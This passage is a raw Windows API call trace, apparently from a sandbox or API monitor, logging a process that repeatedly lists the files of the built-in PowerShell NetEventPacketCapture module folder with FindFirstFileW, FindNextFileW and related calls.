lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.311] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0177.311] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0177.311] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0177.321] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0177.321] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0177.321] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0177.321] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.321] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.322] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0177.322] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.322] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.322] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.324] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0177.324] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0177.324] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.325] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.326] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0177.327] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0177.327] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0177.327] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0177.327] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0177.327] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0177.363] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.363] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.363] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0177.364] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.364] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.364] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.365] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0177.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.365] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.366] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0177.366] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0177.366] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.367] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.367] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0177.367] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0177.367] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.368] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.368] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0177.368] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.368] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0177.368] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, 